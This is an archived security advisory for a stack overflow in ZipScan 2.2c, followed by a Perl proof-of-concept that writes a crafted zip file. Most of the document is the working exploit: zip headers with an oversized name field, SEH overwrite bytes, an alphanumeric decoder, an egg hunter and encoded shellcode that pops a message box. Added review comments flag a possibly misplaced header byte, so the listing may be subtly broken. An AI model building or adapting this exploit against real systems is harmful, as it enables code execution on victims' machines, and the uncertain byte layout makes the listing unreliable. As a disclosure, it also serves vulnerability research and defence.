
packetstormCorelanc0d3rPACKETSTORM:88056

ZipScan 2.2c Buffer Overflow

2010-04-06 00:00:00
corelanc0d3r
packetstormsecurity.com
|------------------------------------------------------------------|  
| __ __ |  
| _________ ________ / /___ _____ / /____ ____ _____ ___ |  
| / ___/ __ \/ ___/ _ \/ / __ `/ __ \ / __/ _ \/ __ `/ __ `__ \ |  
| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |  
| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/ |  
| |  
| http://www.corelan.be:8800 |  
| [email protected] |  
| |   
|-------------------------------------------------[ EIP Hunters ]--|  
| |  
| Vulnerability Disclosure Report |  
| |  
|------------------------------------------------------------------|  
  
Advisory : CORELAN-10-020  
Disclosure date : April 3rd, 2010  
http://www.corelan.be:8800/advisories.php?id=CORELAN-10-020  
  
  
00 : Vulnerability information  
-------------------------------------  
Product : ZipScan 2.2c  
Version : 2.2c (latest version)  
Vendor : [email protected] / http://www.zipscan.co.uk/  
URL : http://www.zipscan.co.uk/download.htm  
Platform : Windows  
Type of vulnerability : Stack overflow  
Risk rating : medium  
Issue fixed in version : not fixed  
Vulnerability discovered by : Lincoln  
Corelan Team : http://www.corelan.be:8800/index.php/security/corelan-team-members/  
  
  
01 : Vendor description of software  
-------------------------------------  
From the vendor website:
"ZipScan searches archive files. It can search Zip, CAB, RAR, ACE,  
InstallShield CAB, JAR, TAR, GZIP, Z, ZOO, LZH, ARJ, CHM and  
OpenOffice files, including password-protected, nested and  
self-extracting archives. The program supports text searching and can  
open and extract files."  
  
02 : Vulnerability details  
-------------------------------------  
When a specially crafted zip file is opened from within ZipScan,
an exception handler gets overwritten, which allows arbitrary
code execution to be triggered.
The way to trigger the vulnerability :  
  
- open the zip file from within ZipScan : "File - Open Archive File"  
Or  
- Click "open archive file and view its contents"  
- double-click on the filename inside the zip file  
  
  
03 : Author/Vendor communication  
-------------------------------------  
March 23 2010 : author contacted  
March 20 2010 : sent reminder  
April 3 2010 : No response, public disclosure  
  
  
04 : PoC  
----------  
#!/usr/bin/perl
# Software : ZipScan 2.2c (.zip)
# Bug found by : Lincoln
# Author : Lincoln & corelanc0d3r
# OS : Windows
# Tested on : XP SP3 En (VirtualBox)
# Type of vuln : SEH
# Greetz to : Corelan Security Team
# http://www.corelan.be:8800/index.php/security/corelan-team-members/
#
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
#
# Note : you are not allowed to edit/modify this code.
# If you do, Corelan cannot be held responsible for any damages this may cause.
#
#
# Code :
#
# What this script writes (for analysts reading the PoC):
#   a minimal ZIP container holding one entry -- a 30-byte local file header,
#   a 46-byte central-directory entry and a 22-byte end-of-central-directory
#   record -- whose entry *name* is the oversized $payload string instead of
#   a real file name.  That over-long name is the input the advisory above
#   says overwrites an exception handler when ZipScan parses the archive.
#   Detection angle: the name-length field (0x1388 = 5000 bytes) is present
#   in both headers, so an archive scanner can reject entries whose name
#   length exceeds any sane path length before ZipScan ever opens the file.
#
# NOTE(review): the generator itself runs without `use strict; use warnings;`,
#   uses a bareword filehandle and a 2-arg open with no error check, and
#   shells out via system("del $filename") -- the interpolating form that
#   perlcritic flags, even though $filename is a fixed literal here.  These
#   are hygiene issues in the script, not part of the bug being demonstrated.
print "|------------------------------------------------------------------|\n";
print "| __ __ |\n";
print "| _________ ________ / /___ _____ / /____ ____ _____ ___ |\n";
print "| / ___/ __ \\/ ___/ _ \\/ / __ `/ __ \\ / __/ _ \\/ __ `/ __ `__ \\ |\n";
print "| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |\n";
print "| \\___/\\____/_/ \\___/_/\\__,_/_/ /_/ \\__/\\___/\\__,_/_/ /_/ /_/ |\n";
print "| |\n";
print "| http://www.corelan.be:8800 |\n";
print "| |\n";
print "|-------------------------------------------------[ EIP Hunters ]--|\n\n";
print "[+] Exploit for ZipScan 2.2c \n";



# Name of the archive written to the current directory.
my $filename="zipscan.zip";
# Local file header (PK\x03\x04): version-needed 0x14, no flags, method 0
# (stored), fixed mod time/date, CRC and both size fields zeroed.
my $ldf_header = "\x50\x4B\x03\x04\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" .
"\x00\x00\x00\x00\x00\x00\x00\x00" .
"\x88\x13" .# intended as the name-length field: 0x1388 = 5000 (author: "file size: 5k")
"\x00\x00\x00";
# NOTE(review): counting the \x escapes, 25 bytes precede "\x88\x13", but in
#   the standard 30-byte local header the name-length field starts at offset
#   26 (4-byte CRC, compressed size and uncompressed size follow the date).
#   Either a byte was lost in transcription or ZipScan's parser tolerates the
#   shift; the central-directory entry below is laid out exactly.  Verify
#   against a hex dump before relying on this listing.

# Central-directory entry (PK\x01\x02): version-made-by 0x14, version-needed
# 0x14, no flags, stored, same time/date, CRC and sizes zeroed.
my $cdf_header = "\x50\x4B\x01\x02\x14\x00\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" .
"\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x88\x13". # name length: 0x1388 = 5000 (author: "file size: 5k")
"\x00\x00\x00\x00\x00\x00\x01\x00". # extra len 0, comment len 0, disk 0, internal attrs 1
"\x24\x00\x00\x00\x00\x00\x00\x00"; # external attrs 0x24, local-header offset 0

# End-of-central-directory record (PK\x05\x06): one entry on one disk.
my $eofcdf_header = "\x50\x4B\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00".
"\xb6\x13\x00\x00". # +46 -- central-directory size: 0x13b6 = 5046 = 46-byte entry + 5000-byte name
"\xa6\x13\x00\x00". # +30 -- central-directory offset: 0x13a6 = 5030 = 30-byte local header + 5000-byte name
"\x00\x00"; # comment length 0

# Decoder stub placed right after the handler slots; the author's own
# annotations are kept below, the bytes are reproduced unchanged.
my $decoder =
#pop edx pop esp
"\x5b\x5b\x5b\x5b\x5c".

#jmp ebp
"\x25\x4A\x4D\x4E\x55".
"\x25\x35\x32\x31\x2A".
"\x2d\x55\x55\x55\x64".
"\x2d\x55\x55\x55\x64".
"\x2d\x56\x55\x56\x51".
"\x50".

#add ebp, 526h
"\x25\x4A\x4D\x4E\x55".
"\x25\x35\x32\x31\x2A".
"\x2d\x35\x69\x48\x54".
"\x2d\x25\x69\x48\x54".
"\x2d\x25\x68\x48\x52".
"\x50".

#jmp back to decoded op code
"\x7a\xb5";

#basereg ebp, modified egg hunter mov edx,ebp
#points egg hunter to unmodified shellcode
# Printable (alphanumeric-encoded) egg hunter, embedded early in the name.
my $egg =
"UYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0".
"BBABXP8ABuJIOyJB2bPRPjs2shZmfNwLWuSj44ho".
"nXRWdpVPqdNkXznOrUZJNO45jGKOxgA";

#msg box "Exploited by Corelan Security Team"
#encoded with Alpha2 base reg edi
# Printable payload; the leading "w00tw00t" is presumably the marker the egg
# hunter above searches for -- not stated explicitly in the listing.
my $shellcode =
"w00tw00t".
"WYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0B".
"BABXP8ABuJIoy8c9JkgXYt3jTsiQYg9syQYqYbiRiW".
"9g9QYBiCsrc0CqSssssvW3aqJqzQQV8BpVPqQ4p712".
"KQQsqv1drBabbP2QRcrTprbw2RaSrpXrpTx2a72RU0".
"JCyPJrYSzpKPMrkRk59V1qtSuptQZaD75QqRnP2Rnb".
"rBbQJQVPQ3yV9pBaTPN2Ksa3Q74bPBl0KQSw6BdPLP".
"NBK3rsfqW0lrlpKBqQFQTpHBlRkpQPnbeppBn2Ksua".
"vrpWHRpBoswQxPPPuPLTsBpRy1UPQPKQq0KropH51p".
"QRPPL2kPPPlQVrd0E44pL2kCaruqWpLBlpKpPcd0Cd".
"uPPRXPCFQpKaJ0LPK2b2JpGSXPNRKw3BJW7Rpsucar".
"jpKQX53QVf7bpw9BnbKW4PtBlRkw5pQQZ0NBd410I0".
"orpDqBkppbkPLBnblpOSDPKRPQSpDqV0jaZCQrjBOq".
"T0M3wqarkSGcxPi3zPQrkPOPIrOG9ROSurKpCrlqUS".
"D3aUhrqau1Yrn0NPkpB1jsu0tRerq0JpKssqF2nBK3".
"vPlSr2K2lpKssSZPEpLPC6QSzbkPNPkW5qDRnRKqW4".
"1RmwHRosISabtcv74rgbLG5fQBj2C0Og2QT1XbfBiW".
"8sdpOpy2kQEpMv9CyrrpPbHpLpN0PRnQTpN3xRLRp2".
"rpKrxpM2lpKBoqYpoPKPO2oQiv1seG6QtpMpkF1PnS".
"yQX0MtrpQrC2lpGsu0LPD54sag2pMtxPNBKw9ROBiR".
"OPK0OPLRiqRsUQWBXG32x1RPL2pPl0EPppKpOrqPxQ".
"Ww3Suu2sv2nreVT3u4xV1REPQqspEp50D6RRmChV1p".
"LaT2D2dczBlSyaXcVQSbFpKroSsqu3v3TblCy2k0rp".
"PpPpMbKPN78rlarv0pMpMplpNpgQWpl3w2t2fVRpKs".
"hpC2NpIPoPIpoRiPoCraXPQrTqURQpQpHpEPp73PXQ".
"T4pQS77aRRnw2G5CtPq0K0kPKGHqSplSuBTaVu6pK0".
"9QXRCpE6X2p51G2PMv0shG5Pprqt8QRsiqUbPRpSdp".
"QRUbqrXQTVU1S3rrpPiPQU4PCv8savPQS2Cg5Ue3sC".
"cV1t8qRW5PBPL0PsQRp0nrbcxpQDpSaPSRp2OPPRRQ".
"UUhpCpTv1dpbp2B73W9PQPx3rpOpCQIsr2tBppeF1b".
"XSrpepQu872pPV0BLW6saQXCyRnaxBpPLbf74PEPr0".
"MCi0IBQqTt1pJprqSrBCsSSRp0QQVp2pKRo1X0PRpt".
"qpOVPPF6PbkPObqPECtsxSuRzQQ1QA";

#Filler
# Trailing filler appended after the shellcode.
my $mjunk = "A" x 30;

# --- payload --- 5k total
# Entry name = filler + egg hunter + filler, then the two 4-byte slots of the
# exception record the advisory says gets overwritten, the decoder stub, the
# shellcode and 30 bytes of trailing filler; ".txt" is appended so the name
# ends in an ordinary extension.  The length() print below is how the author
# checks the total against the 0x1388 (5000) name-length fields above.
my $junk = "A" x 22 . $egg . "A" x 3427;
my $nseh="\x7a\x06\x41\x41"; # next-SEH slot
my $seh="\x16\x09\x01\x10"; #universal -- handler slot; "universal" is the author's claim, not verified here
my $payload = $junk.$nseh.$seh.$decoder.$shellcode.$mjunk;
$payload = $payload . ".txt";

print "[+] Size : " . length($payload)."\n";
# NOTE(review): Windows-only `del` run through the shell; unlink($filename)
#   would be portable and avoid the shell entirely.  Harmless here because
#   $filename is a literal, but the interpolating form is the one to avoid.
system("del $filename");
print "[+] Creating new vulnerable file: $filename\n\n";
# NOTE(review): 2-arg open on a bareword handle with no `or die`; a failed
#   open is silently ignored and the print below goes nowhere.  No binmode
#   either -- I see no 0x0A byte in the strings above, so Windows text-mode
#   newline translation should not alter the output, but binary output is
#   normally written through a binmode'd handle.
open(FILE, ">$filename");
# Archive layout: local header + name, central-directory entry + name,
# end-of-central-directory record (both name copies are the same $payload).
print FILE $ldf_header . $payload . $cdf_header . $payload . $eofcdf_header;
close(FILE);